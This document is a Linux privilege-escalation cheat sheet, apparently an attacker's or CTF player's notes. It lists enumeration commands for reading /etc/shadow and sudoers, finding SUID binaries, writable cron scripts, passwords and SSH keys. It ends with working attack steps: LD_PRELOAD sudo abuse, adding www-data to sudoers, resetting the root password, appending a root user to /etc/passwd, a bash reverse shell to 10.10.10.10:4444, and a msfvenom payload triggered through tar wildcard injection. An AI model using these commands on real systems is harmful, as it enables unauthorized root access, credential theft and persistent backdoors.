uname -a
ls /etc/*-release
cat /proc/version
cat /etc/issue
cat /proc/cpuinfo
cat /proc/meminfo
lshw
lscpu
lsmod
df -h
lspci
lsusb
ps aux ## if anything looks out of the ordinary run pspy and you might find smth
ls -al /etc/init.d/
find /etc/init.d/ ! -uid 0 -type f 2>/dev/null |xargs ls -la
env
echo $PATH
#Installed Packages
rpm -qa
dpkg -l
pacman -qe

whoami
id
#interesting group?
find / -group *group* 2>/dev/null
sudo -l
cat /etc/passwd
cat /etc/shadow
cat /etc/group
cat /etc/sudoers
ls -als /home/*/.ssh
ls -als /home/*/.gnupg/
ls -als /home/*/.config/
last -a
w
history
getcap -r / 2>/dev/null

ifconfig -a #Network interfaces
hostname -f
cat /etc/hosts
ip a
ip route
route -n
ip addr show
ss -twurp # Lists active connections and processes
netstat -auntp
arp -a #arp cache
ip neigh
netstat -ano #-l listening, -t and -u, -p pid 
nmap -sT -p$ports portquiz.net #outbound firewall rules
cat /etc/resolv.conf #DNS servers

which python
locate python
dpkg -l | grep nginx
python -v
python --version
#Check for mounted docker socket
find / -name docker.sock 2>/dev/null

#look for suid binaries
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
find / -uid 0 -perm -4000 -type f 2>/dev/null
find / -type f -user root -perm -u=s 2>/dev/null
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
#get capabilities, look for =ep
getcap -r / 2>/dev/null
#last edited files
find / -mmin -10 2>/dev/null | grep -Ev "^/proc"
lsof
#history file
find /* -name *.*history* -print 2> /dev/null
#writeable files
find / -writable ! -user `whoami` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null
find / -perm -2 -type f 2>/dev/null
find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null
find / -writable ! -group $group -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null
#timers
systemctl list-timers --all
#scheduled tasks
crontab -l
ls -al /etc/cron*
find /etc/cron* -type f -perm -o+w -exec ls -l {} \
ls -alh /var/spool/cron;
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny*
ps #-e all, -f format, -j jobs, -l long, -u user-oriented
#Tampering with interesting files we have discovered
ltrace file 2>/dev/null
strace file 2>/dev/null
#NFS Root Squash
cat /etc/exports

cat grep --color=auto -rnw '/' -ie "PASSWORD=" --color=always 2>/dev/null
locate password | more
find / -name authorized_keys 2> /dev/null
find / -name id_rsa 2>/dev/null
find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;
strings /dev/mem -n10 | grep -i PASS
cat * | grep -i passw*
cat /var/log/apache/access.log |grep -E “^user|^pass”

ls -lh /var/mail

                

#sudo privileges
sudo -l #gtfobins for quickwins
#LD_PRELOAD
##Loads a library before other libraries, find code online for mal library
##compile with gcc -fPIC shared shell.so shell.c -nostartfiles
sudo LD_PRELOAD=$PATH/shell.so vim

#suid bit
find / -perm -u=s -type f 2>/dev/null
#use gtfobins for wins
#Shared Object
strace suspicious_suid_binary | grep -iE "no such file or directory"
#env vars

cat /etc/exports | grep root
showmount -e <victimip>

#add user to sudoers
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
#change root password
echo "root:hacked" | chpasswd
#add user to /etc/passwd
echo hacker:$((mkpasswd -m SHA-512 myhackerpass || openssl passwd -1 -salt mysalt myhackerpass || echo '$1$mysalt$7DTZJIc9s6z60L6aj0Sui.') 2>/dev/null):0:0::/:/bin/bash >> /etc/passwd

#File Permissions
cat /etc/crontab
ls -l /usr/local/bin/overwrite.sh
change to:
	#!/bin/bash
	bash -i >& /dev/tcp/10.10.10.10/4444 0>&1

#Wildcards
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f elf -o shell.elf
chmod +x /home/user/shell.elf
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=shell.elf